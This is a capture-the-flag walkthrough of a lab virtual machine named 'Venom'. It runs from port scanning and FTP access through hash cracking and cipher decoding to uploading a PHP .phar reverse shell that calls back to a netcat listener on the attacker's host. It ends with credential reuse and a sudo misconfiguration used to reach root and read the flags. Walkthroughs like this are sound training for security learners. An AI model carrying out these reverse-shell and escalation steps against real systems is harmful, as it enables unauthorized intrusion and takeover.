Venom
Port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon venom.vuln
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-19 13:55 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:55
Completed NSE at 13:55, 0.00s elapsed
Initiating ARP Ping Scan at 13:55
Scanning venom.vuln (10.0.2.21) [1 port]
Completed ARP Ping Scan at 13:55, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:55
Scanning venom.vuln (10.0.2.21) [65535 ports]
Discovered open port 443/tcp on 10.0.2.21
Discovered open port 21/tcp on 10.0.2.21
Discovered open port 139/tcp on 10.0.2.21
Discovered open port 80/tcp on 10.0.2.21
Discovered open port 445/tcp on 10.0.2.21
Completed SYN Stealth Scan at 13:55, 1.47s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.21.
Initiating NSE at 13:55
Completed NSE at 13:55, 1.00s elapsed
Nmap scan report for venom.vuln (10.0.2.21)
Host is up (0.000059s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
MAC Address: 08:00:27:16:53:A1 (Oracle VirtualBox virtual NIC)
NSE: Script Post-scanning.
Initiating NSE at 13:55
Completed NSE at 13:55, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
[+] [smb]
SMB venom.vuln 445 VENOM [*] Windows 6.1 (name:VENOM) (domain:) (signing:False) (SMBv1:True)
[+] Guest session IP: venom.vuln:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (venom server (Samba, Ubuntu))
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (venom server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP VENOM
[~] [smb knocker]
[print$]
tree connect failed: NT_STATUS_ACCESS_DENIED
[IPC$]
Current directory is \\venom.vuln\IPC$\
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
[i] [Server info]
http://venom.vuln:80 [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.0.2.21], Title[Apache2 Ubuntu Default Page: It works]
[+] [fuzzin server]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Sep 19 13:55:29 2022
URL_BASE: http://venom.vuln:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://venom.vuln:80/ ----
+ http://venom.vuln:80/index.html (CODE:200|SIZE:11004)
+ http://venom.vuln:80/server-status (CODE:403|SIZE:275)
-----------------
END_TIME: Mon Sep 19 13:55:31 2022
DOWNLOADED: 4612 - FOUND: 2
[i] [Server info]
http://venom.vuln:443 [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.0.2.21], Title[Apache2 Ubuntu Default Page: It works]
[+] [fuzzin server]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Sep 19 13:55:32 2022
URL_BASE: http://venom.vuln:443/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://venom.vuln:443/ ----
+ http://venom.vuln:443/index.html (CODE:200|SIZE:11004)
+ http://venom.vuln:443/server-status (CODE:403|SIZE:276)
-----------------
END_TIME: Mon Sep 19 13:55:33 2022
DOWNLOADED: 4612 - FOUND: 2
recon reports five open ports
┌──(root@ghost)-[/home/ghost]
└─# curl http://venom.vuln/
...
<!...<5f2a66f947fa5690c26506f66bde5c23> follow this to get access on somewhere.....-->
After cracking this md5 hash we obtain hostinger
┌──(root@ghost)-[/home/ghost]
└─# ftp venom.vuln
Connected to venom.vuln.
220 (vsFTPd 3.0.3)
Name (venom.vuln:ghost): hostinger
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||44978|)
150 Here comes the directory listing.
dr-xr-xr-x 3 65534 65534 4096 May 20 2021 .
dr-xr-xr-x 3 65534 65534 4096 May 20 2021 ..
drwxr-xr-x 2 1002 1002 4096 May 21 2021 files
226 Directory send OK.
ftp> cd files
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||46514|)
150 Here comes the directory listing.
drwxr-xr-x 2 1002 1002 4096 May 21 2021 .
dr-xr-xr-x 3 65534 65534 4096 May 20 2021 ..
-rw-r--r-- 1 0 0 384 May 21 2021 hint.txt
226 Directory send OK.
ftp> get hint.txt
local: hint.txt remote: hint.txt
229 Entering Extended Passive Mode (|||45702|)
150 Opening BINARY mode data connection for hint.txt (384 bytes).
100% |******************************************************************************************************************************************************| 384 18.15 KiB/s 00:00 ETA
226 Transfer complete.
384 bytes received in 00:00 (17.63 KiB/s)
ftp> exit
221 Goodbye.
┌──(root@ghost)-[/home/ghost]
└─# cat hint.txt
Hey there...
T0D0 --
* You need to follow the 'hostinger' on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
* some knowledge of cipher is required to decode the dora password..
* try on venom.box
password -- L7f9l8@J#p%Ue+Q1234 -> decode this you will get the administrator password
Have fun .. :)
┌──(root@ghost)-[/home/ghost]
└─# echo WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= | base64 -d | base64 -d | base64 -d
standard vigenere cipher
┌──(root@ghost)-[/home/ghost]
└─# echo aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI= | base64 -d
https://cryptii.com/pipes/vigenere-cipher
Decoded messages. After follow the hint and using hostinger as vigenere key we obtain E7r9t8@Q#h%Hy+M1234 password. Add venom.box to /etc/hosts, after inspect the source code in http://venom.box we found http://venom.box/panel/ where we can log as dora with our decrypted password
┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.0.2.15 1337 > rev.phar
Create our .phar reverse shell
Now we navigate to http://venom.box/panel/uploads/ and upload shell. Then start netcat listener and execute the shell in http://venom.box/uploads/rev.phar
┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.15] from venom.box [10.0.2.21] 48664
Linux venom 5.4.0-42-generic #46~18.04.1-Ubuntu SMP Fri Jul 10 07:21:24 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
00:23:03 up 1:01, 0 users, load average: 0.03, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@venom:/$ cat /etc/passwd | grep -e 'sh$'
root:x:0:0:root:/root:/bin/bash
nathan:x:1000:1000:nathan,,,:/home/nathan:/bin/bash
hostinger:x:1002:1002:,,,:/home/hostinger:/bin/bash
www-data@venom:/$ su hostinger
su hostinger
Password: hostinger
hostinger@venom:/$ cd /var/www/html/subrion/backup/
hostinger@venom:/var/www/html/subrion/backup$ ls -la
ls -la
total 12
drwxr-xr-x 2 www-data www-data 4096 May 21 2021 .
drwxr-xr-x 13 www-data www-data 4096 May 21 2021 ..
-rwxr-xr-x 1 www-data www-data 81 May 21 2021 .htaccess
hostinger@venom:/var/www/html/subrion/backup$ cat .htaccess
cat .htaccess
allow from all
You_will_be_happy_now :)
FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a
hostinger:hostinger reused credentials and we obtained FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a credentials, let's try with nathan
hostinger@venom:/var/www/html/subrion/backup$ su nathan
su nathan
Password: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a
nathan@venom:/var/www/html/subrion/backup$ cd /home/nathan
nathan@venom:~$ cat user.txt
cat user.txt
W3_@r3_V3n0m:P
nathan@venom:~$ sudo -l
[sudo] password for nathan: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a
Matching Defaults entries for nathan on venom:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nathan may run the following commands on venom:
(root) ALL, !/bin/su
(root) ALL, !/bin/su
nathan@venom:~$ sudo -u root bash
root@venom:~# cat /root/root.txt
#root_flag
H@v3_a_n1c3_l1fe.